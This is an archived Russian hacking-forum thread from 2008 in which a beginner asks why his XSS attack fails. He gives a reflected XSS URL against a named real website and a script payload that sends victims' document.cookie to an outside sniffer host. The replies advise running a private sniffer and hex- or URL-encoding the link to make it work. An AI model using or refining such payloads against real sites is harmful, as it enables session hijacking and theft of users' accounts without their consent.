Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 
журналы новости статьи video форум подписка на «Хакер»

Помощь с XSS

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Для начинающих] >> Помощь с XSS
Имя
Сообщение << Старые топики   Новые топики >>
Помощь с XSS - 2008-12-23 20:48:45.086666   
spamerr

Сообщений: 8
Оценки: 0
Присоединился: 2008-07-14 16:05:47.900000
 Вот решыл изучыть XSS.На форуме найшол сайт с XSS:_http://ice.lipton.ru/photo.php?sort="><sсriрt>alert(/xss/)</sсriрt>.Решыл попробовать собрать инфу сниффером _http://old.antichat.ru/cgi-bin/log.php.Подставляю в адресную строку браузера вот такой запрос:_http://ice.lipton.ru/photo.php?sort="><sсriрt>img = new Image(); img.src = "http://old.antichat.ru/cgi-bin/s.jpg?"+document.cookie;</sсriрt> но на сниффер не прийшло отчетов.Также пробовал кодировать,но тоже не работает.Подскажите как сформулыровать запрос??в чем мои ошибк
Post #: 1
RE: Помощь с XSS - 2008-12-23 21:23:12.103333   
MASTERLOMEMASTER

Сообщений: 48
Оценки: 0
Присоединился: 2008-12-20 13:16:33.596666
 эти сниферы полная лажа про coockies подробно читай тут http://forum.xakep.ru/m_1311051/tm.htm
Post #: 2
RE: Помощь с XSS - 2008-12-23 21:53:31.743333   
Pashkela

Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
 2 spamerr:

Не факт, что ачатовский сниф сейчас пашет, юзай свой собственный, проверенный предварительно на себе же. Ну и саму ссылку хексить обычно надо, а не так прямо с ";" и прочим
Post #: 3
RE: Помощь с XSS - 2008-12-23 21:57:44.350000   
FriLL

Сообщений: 2539
Оценки: 335
Присоединился: 2007-08-11 17:14:26.703333
quote:

Ну и саму ссылку хексить обычно надо

или в url-code
Post #: 4
Страниц:  [1]
Все форумы >> [Для начинающих] >> Помощь с XSS







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.